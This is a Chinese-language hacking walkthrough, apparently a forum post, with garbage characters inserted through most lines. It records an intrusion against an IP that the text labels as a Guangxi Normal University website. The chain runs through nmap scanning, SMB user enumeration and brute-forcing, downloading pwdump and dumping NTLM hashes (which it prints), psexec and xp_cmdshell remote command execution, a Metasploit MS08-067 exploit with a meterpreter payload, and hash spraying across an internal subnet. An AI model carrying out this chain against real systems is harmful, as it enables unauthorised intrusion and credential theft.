广西师范网站http://202.103.242.241/
; x# U5 Y# v4 A
" u9 o1 l2 S; v0 K0 a" q+ \root@bt:~# nmap -sS -sV 202.103.242.2411 c4 l9 \# c* j; ?
; z) R6 T$ |+ g4 G4 Z. G2 S" @Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST) m7 ]' ~7 a# |& l7 q& S' m/ `1 t
, S; |' g* ^' lNmap scan report for bogon (202.103.242.241)
% n& c3 k; n' |2 D* u- t9 Z/ U
Host is up (0.00048s latency).; j5 i! O. p2 O8 ]1 w, v/ I
0 j1 K/ [7 E2 Z! V0 v1 @Not shown: 993 closed ports- c3 Z) k0 q3 v8 r
) b7 c1 I% Z$ ?, \; d ]PORT STATE SERVICE VERSION
8 j. h, F- t- [# p; L, X3 `& X3 x v& M; @
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* c# g. [: b- l. e$ u8 ?
* c0 v1 \5 k2 e
139/tcp open netbios-ssn! H* a$ B7 R9 \5 M6 l
b4 I2 @, d' D445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds+ k' E9 D" u% ~; p
5 m; {9 Y1 [2 D7 U$ m1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)4 h* ^3 q/ H. G( p
0 B; b% \$ x G0 _
1026/tcp open msrpc Microsoft Windows RPC' f$ E6 A+ ?# m; {, ^4 o7 N
6 z- b3 M0 ?7 y: r) h3372/tcp open msdtc?/ Z1 R9 J( T/ \) w1 C
7 ?, H S' o* P8 m7 ?2 ]& w: L6 ^3389/tcp open ms-term-serv?, {; }0 V( U. H7 r% n$ P9 S, }
, A# W, ~4 ~; z8 f( R+ O- m S
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :, ^% @, t0 i9 @
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
% \+ }6 u" } z* @7 p* ]" x. m e; l$ T* D0 C
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions: a3 u& ] a$ I2 F+ E+ I' u' q
$ Q7 c8 {* g/ N# U* Y
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)6 n8 J5 U6 H/ x
: R2 F0 |) A* C [SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
& b4 }: c0 K1 @/ `% u& M. y) }1 l- c' G6 a$ _) t! d9 i
SF:ptions,6,”hO\n\x000Z”);. _* @: }# K2 F% Y
% \; [/ ]) [2 y5 k4 M+ j: U7 ?
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)) m, {+ K f/ W% @- {$ ^9 d. s
) F9 j: }3 S- Q: [% {# T' \" [. w
Service Info: OS: Windows4 { a; L. L' n4 R& q% ?! n/ w
1 `3 d) L+ W: y/ ^" x
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
0 V7 e- [+ f( n* c
4 D5 t1 D$ K- Z$ y, g' _# xNmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ H- }0 \+ o; k7 A; g" z
, T3 q8 L/ F% i0 b% O2 S# N yroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本0 r u/ q @( a4 Y+ W j
8 e6 B1 p' [% o-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
4 w4 p; p, a) K( P1 _1 G
# H+ J0 p' {( j5 E: {-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
8 W/ P! R4 d/ Z5 }: B8 p! J8 C) S6 c- Q- H6 ?
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse. {% W6 D, [+ M8 H* q- g' U
( P9 N5 C9 }- p' U3 C- Q0 z! V-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
8 H8 z" T# U$ g7 N q8 k* f- i, L8 z- [0 ~4 o
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
* c1 {$ Y4 |# { ]9 G8 B+ I" i- u* V, B' u0 [
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
9 r: e- Y+ G6 E6 p( z8 H1 T
3 ?1 x6 I! d. c' p+ [-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
# r) I ^+ _' V% f& d9 i
W3 i. c( P& W: F% r" |-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse2 {; ~" f& C8 b( Z5 `. m
7 o, o& o. h: y+ c# n0 G3 i& D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
! e: J" B* r5 r2 T$ L. P: g
$ f! r# E6 ~$ W- i7 }-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
* f$ i7 ^4 \8 h# V1 H! ^1 N) C' q8 b4 @7 Z1 [
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse' Y4 ?) o% o2 X6 L) Q: N6 r
, j9 J3 ` M3 M0 E) y
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
$ B G% K, K' z: J1 z8 T
2 c* m, w$ ^6 w-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse$ I6 y' D" r4 }6 D' _7 P
0 P. u0 T/ y T8 H
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse7 X" [! A: ~. e3 ?# a" l
3 T" z+ l, M9 x6 V
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse' d" H: y$ h7 b6 M o2 j/ a
* O4 i9 C) ^1 u( t8 b. M# ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
5 o% t" d! {1 z/ f4 D. t& i" V( w0 e0 Y
//此乃使用脚本扫描远程机器所存在的账户名 Z7 D" o4 p1 m) M9 C6 ?
' U* y8 L0 C' I; F/ i% [' n
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
2 I/ B5 {1 r( ?* O
# Z7 e6 N+ w# t) C! f, kNmap scan report for bogon (202.103.242.241)' ~4 E' S2 e& L! Q( ]
4 m9 b' u+ y1 c% E; `Host is up (0.00038s latency).
, A! v- f& y! E# m3 R; A1 z
* w* }1 k. x/ _0 E, Z, a4 YNot shown: 993 closed ports
7 O/ ]3 w+ _5 O0 f8 C5 C
, J" K m" Z' q! v v7 K; nPORT STATE SERVICE' E$ R$ [/ s# J4 B# w
; V/ n2 s# R9 u! Y" J8 ~/ Q
135/tcp open msrpc
) |, z6 }" M) w+ z9 ^$ I( b2 T4 y7 h
139/tcp open netbios-ssn1 c7 U7 W/ r% l
) q- r. N+ m; J* D+ K( j
445/tcp open microsoft-ds8 P' g- H: s( P- V% k* o9 b
" ?" ~4 K Q }# G3 U1025/tcp open NFS-or-IIS
# w, E0 [1 A6 ^' u* k/ l
8 z. q' h6 j9 t# p+ e1026/tcp open LSA-or-nterm
, r+ n' x9 p# e5 _5 ]! J$ z Q/ {
3372/tcp open msdtc' d6 x5 g4 P9 R5 G! X+ D1 `
$ ~9 | O! q6 L. u! v
3389/tcp open ms-term-serv
" \( D! }) Z/ @9 W4 @( x/ w% z( N: ~1 r2 {' v1 R5 H
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
- Z M* P( Y7 t( u( e* G4 Y1 i! }7 Z7 v. r6 _; R: h- }
Host script results:# \3 a9 V+ d1 I7 q, Q% g
. G1 v3 D8 \8 C; s: _4 k| smb-enum-users:& z, @6 f8 D/ y) R" g, w$ y$ z
: ]* I% v* t. l- J u
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 L/ d+ h( @" ^- H- H' w
. {. j; F2 a& ]5 z2 }1 x+ h
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds3 @1 i8 N0 Z$ v1 f% k1 `9 ~* B* U
- _/ W4 S. m( k
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
) G( j6 k+ M- u7 ~) U3 O
' d# ?" d( R: E9 W1 ~/ w* G* p//查看共享
% k1 ]8 G1 H; q+ z4 d) d& }, P, K- ~( l+ Y% }
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST8 m4 S K" ?% M* r7 P3 F
0 \" L! _/ v" _) D; ?1 w( nNmap scan report for bogon (202.103.242.241)
e, k- |" g. U0 Z
# J5 ^6 m6 ]2 R' V8 |8 F; I8 a4 k8 iHost is up (0.00035s latency).
, ]( }- w. b9 h' ]9 }
+ l& ~( r5 w5 d8 xNot shown: 993 closed ports# D: k/ O& y+ Q) |# j
% o) S5 P, f# u! [2 zPORT STATE SERVICE
' t l5 _/ v4 E: j% a1 C
3 J- O$ e H$ Q6 c135/tcp open msrpc! V9 S2 f! R/ E+ x; |2 X- H8 p
P" T8 N. b+ b$ ^# ?/ z$ E
139/tcp open netbios-ssn
) N0 S, H9 s$ C3 L1 B+ w1 s3 D2 K P5 b$ N7 C
445/tcp open microsoft-ds
' M7 T0 m% G4 I# ~. y! I. b
" O% Q( {9 p, l8 U# H% q1025/tcp open NFS-or-IIS. A. \% ^3 W2 k" p
5 Q! X" q1 {6 q& |* ]3 Y1026/tcp open LSA-or-nterm
8 e& o* O7 ?2 ]) Z8 r- @5 r5 ^) l9 F
3372/tcp open msdtc0 N p' Y* [3 ?! ^
3 H( [; x$ B; }$ N9 m3389/tcp open ms-term-serv
5 ?; X5 k# y# w% e9 i
0 z- M( t2 `5 v% w# Q7 P- BMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)- p* X/ U- _" h- E! T; D6 ^
+ o# Q) f" ^9 |$ d3 C0 N! zHost script results:7 ?/ c" R, p: b4 U* o! j
# K% `8 W, ~0 o; Q+ }: n
| smb-enum-shares:9 u) H1 n- P+ @! s' t
6 ^' O& N; ]! p- K! E7 B| ADMIN$4 @) }1 c8 f! y" V7 w& c) C
5 X- ]; [% F- G5 X) |0 |
| Anonymous access: <none>9 ]. O/ a) N- n0 z2 |' u2 L
) L4 G) m/ w* g0 v0 {% Q; o. {% S| C$7 l: h6 B- x# u& b! Q/ i1 H
! z0 O: V3 \% j* L; F0 ^3 t
| Anonymous access: <none>
2 d9 T% c5 E/ Q2 J# j F6 E! k' y! y. s! a( p; A
| IPC$' l! B; B6 O& p4 z, a+ n2 ^- P
& G0 K6 h7 U% J2 L! F|_ Anonymous access: READ
, _# p- a& e$ O& v& M" c' ~" F: d8 G
/ m( r# A8 k* C/ F" c* X" o3 {3 rNmap done: 1 IP address (1 host up) scanned in 1.05 seconds: H: s$ h/ \& l1 W0 m. W
. L% F5 ~# Z7 v Y+ A! R
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 }9 I" {, k; B' t. r7 t8 W" a
# L- I4 f" v( ^, j9 L/ I" _, B/ S//获取用户密码% e2 @8 ?. q2 }' M6 E. u( i) e! n" F
7 C+ j! P& `1 z- e7 A
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST& y6 N8 J+ e* [
9 A" {; w! V9 ?+ i T
Nmap scan report for bogon (202.103.242.2418)
) z0 k2 K6 H- r. U! S" @+ r) `- S
' x2 G ^# Q) A! y$ zHost is up (0.00041s latency)." w9 i# @. M. s' O) ]& W5 {: G; P
; W, {# E5 \) P
Not shown: 993 closed ports( @0 j8 ?3 y0 @1 y1 r I! \$ g, ]) q
& j5 [$ H6 L6 _% U. z
PORT STATE SERVICE' O& P1 @" h7 q) q
5 s: c( h3 @* ?% t$ |
135/tcp open msrpc
9 o+ m4 X1 J" k' E* U; U% O2 }6 V3 v5 ^. Y' v4 B$ ~4 [) z/ R
139/tcp open netbios-ssn0 n, v4 X' B- h8 R8 z
( X7 y+ l7 I- x8 i7 M445/tcp open microsoft-ds
( e t. F' p: l; Q% m0 z" g2 x. H4 n$ O3 F! f0 R
1025/tcp open NFS-or-IIS
$ B. i# G1 z1 X5 g% h; [5 ~6 I" [! h9 Z1 S x1 p, o! U5 {
1026/tcp open LSA-or-nterm3 m+ U. i9 K2 j3 h9 e4 b
. d1 R- O+ Z& B$ t e3372/tcp open msdtc
7 B& n! B( y+ S; x6 Z2 v6 C" L: g/ m" l- W2 s6 }! f. N% u+ C
3389/tcp open ms-term-serv
1 Z. m0 Y9 n) o% N) ?6 Y! n1 g# r) a1 l- g# E
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 i; m7 l4 ^0 `
0 T2 C# p9 Q/ I: h5 LHost script results:
$ q( f4 _2 \. Y. X" {
, J' D% i/ S" u2 p1 `5 z% r- o| smb-brute:, t8 I& o) W) z: n2 W: |5 Q
, z: k9 j5 n& f3 l Q$ vadministrator:<blank> => Login was successful- z! l6 ]* ?5 y# n
7 q% |* j" B2 G( X|_ test:123456 => Login was successful
) \+ h* a3 I7 F# H3 n
. c7 |9 u* G$ Z B6 PNmap done: 1 IP address (1 host up) scanned in 28.22 seconds9 @8 z3 l3 e1 M. I- V9 A
$ e$ G- e0 G6 c8 ]2 h, P& oroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash1 y* q d" l1 H" i
6 @9 m. Y. E1 G. k) Rroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data% r W' R6 f0 R0 X! L# }
7 ?0 r- L1 E, [' W' f* H
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse' l7 I s* x! {
9 ~5 d, S! ~# }, j) r9 D$ groot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1396 h4 n' L% J0 x7 b
% Y1 o* Z5 K* DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST' ~5 C4 r. s# |. ?% G
# b9 w( P8 z: q P6 h; V1 ~Nmap scan report for bogon (202.103.242.241)
" F" J' t, P: {% `0 a+ `* M
1 S/ R* A8 x$ p/ }( sHost is up (0.0012s latency).4 ]: x' Q5 u7 t: z+ R0 W. ~
L* V0 N V5 [ h
PORT STATE SERVICE( S! Y) c1 V, c* h
, M) Z: |! R$ C0 O* \2 {, _135/tcp open msrpc
4 P; p2 O- g6 e, u: b6 M$ V: q
/ e* h/ E, r# }' h/ w9 O# y139/tcp open netbios-ssn7 a2 W" f: T5 J- {& |9 |! a4 s
, B: _& {% y1 j, ~445/tcp open microsoft-ds
$ i, S9 x0 Y, R0 N3 r& i# s* C9 I2 k! Q
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 R6 o2 G: e% T/ c
( o+ W b- c: v) FHost script results:( G0 L& _8 g t/ M# u/ E3 {# m
7 `' T/ [/ e4 ~% E| smb-pwdump:
5 X( [( k9 X; K3 b! r$ }1 p8 v3 e5 t& o" O# T/ h" Y3 a2 [( ]
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 X# S6 C8 v* f! D- g
, |6 T3 O, o9 x$ ~! z; b. R, M
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************+ R* l* L0 H# ?
- D0 o, X* P) r& m( ?5 Q- {, X| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4% U$ X% z- m5 i3 m, P8 v
# [; z' k% t( C' o. v|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2, ?: ?2 m4 u$ V8 l0 @0 h3 x$ i
$ d5 F) z) O( lNmap done: 1 IP address (1 host up) scanned in 1.85 seconds( a* q1 S) h+ ~9 F4 h( i9 q
' U0 v, L) k! X% a' c. C" V
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
6 v+ z8 S( c# n& z! ]8 R9 H- Q1 X' q6 g
-p 123456 -e cmd.exe& ], m# W1 a' i# P2 I& K& C) x4 M
# I* ^: U; z% dPsExec v1.55 – Execute processes remotely
, B1 g8 j$ g1 C6 Q; o F
7 g: r2 l! p+ S8 d- ]& QCopyright (C) 2001-2004 Mark Russinovich. X* h( p2 U+ O t0 T
/ r+ X4 ` t3 x) B+ o$ MSysinternals – www.sysinternals.com. J$ [0 o8 \& m
/ O+ D. \4 c6 d* a) jMicrosoft Windows 2000 [Version 5.00.2195]
* @& y0 a0 C, T! J1 C# s) `& D+ O% ~+ _/ M' T" e
(C) 版权所有 1985-2000 Microsoft Corp.
C- w$ @7 g& S( ]/ R; K9 @/ x0 o+ L7 H) G9 o) T9 C- g
C:\WINNT\system32>ipconfig/ V; ^, }( Y0 `, \0 q
% j7 l$ ]( A% w: W ?) oWindows 2000 IP Configuration
q) H' H6 s; O& Q1 M6 e% |1 E$ Y: J
( N4 |& |4 D8 jEthernet adapter 本地连接:7 _: |& I# U I" k. F
" T% U' P! P) h
Connection-specific DNS Suffix . :
, J9 R4 u, S0 v% j3 _
9 B( }( y0 v7 P! M8 fIP Address. . . . . . . . . . . . : 202.103.242.2419 M8 e- a& Y8 {) `7 _
, D# P; l$ o" N. X! s- XSubnet Mask . . . . . . . . . . . : 255.255.255.0' J& E, u. I' n, v% E% y
l5 M9 W' q2 \' b8 \) y# O; @Default Gateway . . . . . . . . . : 202.103.1.18 T4 b% A( H1 }; W1 x7 R$ e E9 l
) p. L+ `0 U- ~/ H" F5 |! T. JC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令5 c4 E$ Z1 [8 A6 A
% Z' i6 L. ^! Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
/ i1 ~4 q, a( Q( J4 ~' p. O6 ]5 u0 K; X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
F8 A- b' m9 l+ ~& T/ V$ o3 e4 [' q+ Q6 j
Nmap scan report for bogon (202.103.242.241)
1 G2 u6 h) N0 o# Q0 e3 y: L7 ]9 N& {8 `! k0 ] ]% I, j
Host is up (0.00046s latency).
7 N5 t8 y* k" ~5 U& ]0 c2 Z
* F$ }8 t Y: \& l) |" `" t- ZNot shown: 993 closed ports
) o% k* m" ]8 o' H3 v6 m
- |' \0 Z+ e. ^3 LPORT STATE SERVICE# b" f8 n) W5 t: G% m. O
% N" C2 h& S. A135/tcp open msrpc$ n c) t2 }/ I3 ]! W* ?
0 O9 H/ M' M9 i) _139/tcp open netbios-ssn% |/ K$ M3 \$ N" E
: f; C( G9 `. y5 \4 r" J' a
445/tcp open microsoft-ds
) p4 j5 r7 L6 v4 o8 p5 v1 [
5 N8 K5 y. e2 J1025/tcp open NFS-or-IIS
# q- J5 y8 Y5 D% ~3 d, D9 S8 O" ?9 S3 p/ D9 I0 K1 K
1026/tcp open LSA-or-nterm
+ Q) @7 Q) _) i; S6 X% d8 R. J: f# L2 G5 H* n0 x6 j
3372/tcp open msdtc: W: d* Y# y7 a* G5 F
) V) k* C1 k% T& ~. A2 V& \3389/tcp open ms-term-serv u) r" D. z; s+ w4 N- _# I
& [! _' s7 ~4 M* R4 e1 y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 J$ V; u6 y8 k- f1 {$ {$ ~+ U0 _
# w0 v; p. Z2 }0 Q- ]+ [
Host script results:, y( a' t: J9 q7 r9 l
. h- w/ J5 [1 e8 }: c( f% t| smb-check-vulns:5 @9 o; N& ?! R% {$ S. I
' ~ Z+ \' f, w) x( G- t% m; L+ h|_ MS08-067: VULNERABLE3 e! d @6 a4 i3 o
. V+ | _9 t H. p% x
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds" P5 T5 |' k" g
! }* B" s! V2 s2 y/ ~' _0 D q" croot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
5 N! z* x1 e2 g' a6 h" x( z) H l4 p2 q0 _7 Z$ S0 X
msf > search ms081 m3 v1 q* I8 `2 |
! z7 E* W: J0 g- q; w5 xmsf > use exploit/windows/smb/ms08_067_netapi' ^! B. A9 k: t& Z; t( V
' v# J8 j- l' Y/ l
msf exploit(ms08_067_netapi) > show options
0 c) S" S( z8 E' C
" k9 l) s- ~# r: Z5 Fmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241$ h& _) o+ k& Y6 I8 I
5 Y) O5 `& k' i
msf exploit(ms08_067_netapi) > show payloads
3 d3 [! b) p, D6 M) r c/ s
/ e" Y, m3 c& U6 I/ w2 R7 |- }+ \) imsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
, {, s6 P1 K; J i, _+ h# V$ U) I7 u
msf exploit(ms08_067_netapi) > exploit
/ T$ M. R7 \5 e' k1 g
$ `4 v: c5 i! _$ [ t* E: O: M( Wmeterpreter >& }4 z; {* _. n, d& f4 x
" D# ?9 i4 U1 I2 ^. W* O% }. T+ bBackground session 2? [y/N] (ctrl+z)9 u2 V3 b/ Z0 Y' M
9 i5 s, g" S8 h% j, d7 I
msf exploit(ms08_067_netapi) > sessions -l1 h; R: S( M; R# ^, j+ [% m1 i
% M, l! o3 V }' q
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt0 S/ S& j2 {3 P0 @) ~& D7 [
( U& j! r7 |; Y% A! |4 p) U
test
4 _& U6 ?' Y8 @) e
. j, D) U' [" `1 I. N1 c! yadministrator
: n2 a7 o: u4 {+ F' d9 k! z6 k7 Q5 t) _8 ?- m
root@bt:/usr/local/share/nmap/scripts# vim password.txt3 z6 [% n2 F+ D7 P! J; o
: |, x9 K/ |- p
44EFCE164AB921CAAAD3B435B51404EE
3 w3 g9 o% V+ s- N6 ~, w3 v+ o. w3 F/ L/ l0 b/ A: O2 r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
8 L- B. A% o. z" S$ g" k7 w. F% d- i+ v4 L4 u. x) l! m- [3 b
//利用用户名跟获取的hash尝试对整段内网进行登录
" V) b/ T1 F" n* W. a) s& R! Y. y/ C+ ~% L
Nmap scan report for 192.168.1.105/ V: z% c; W+ _
: C" W0 K8 |# A, r! O6 U
Host is up (0.00088s latency).! o6 S3 t% D# `# _, f
: n. [6 ~; O/ E3 s
Not shown: 993 closed ports8 M& J, H6 i t' {' Q
( F6 w! g5 g9 [& `" p( IPORT STATE SERVICE
1 ~8 h. O9 w( p( p
/ O: M/ y; f5 @135/tcp open msrpc6 P9 F8 H4 N; a+ ] Q1 B9 s
. _9 ^- U- g4 ]- }3 d
139/tcp open netbios-ssn/ C& l; \$ [2 {2 _( G; M
% m# _, ~- t& t- F
445/tcp open microsoft-ds' w5 c A7 X$ {: H1 r4 h$ Q7 i& G4 X
+ i1 W$ y/ G l! X0 N( |
1025/tcp open NFS-or-IIS! v, K5 X0 I8 S/ y4 H0 e
9 x: o$ m1 }0 i1026/tcp open LSA-or-nterm
& D0 q7 \# R, F$ ~3 ]* T* h( d! n9 {. q* M8 s2 K, g
3372/tcp open msdtc, b5 a% Q* B2 T; |& {6 J( [
# J4 U: u8 `* H: l/ [
3389/tcp open ms-term-serv: y$ Z' Y* X$ t& N: M( g/ K$ f
1 N# Z1 g4 }* s2 T0 YMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( F; a% R: T: D# c8 ?3 D( x% J5 v
Host script results:
$ i6 R4 h# ]1 h. F- Q
$ R; t K% F2 j2 R| smb-brute:: d& t- m6 Q' D+ C% ~
9 j- d8 R4 ?0 A* \- b+ g' I|_ administrator:<blank> => Login was successful
* e% c6 E2 Y" V+ w P7 h$ }$ o" u$ e1 i0 ?% ~9 n
攻击成功,一个简单的msf+nmap攻击~~·
2 g9 W" h) }8 S' f1 V! ]4 V! p1 g7 ]- C" O
|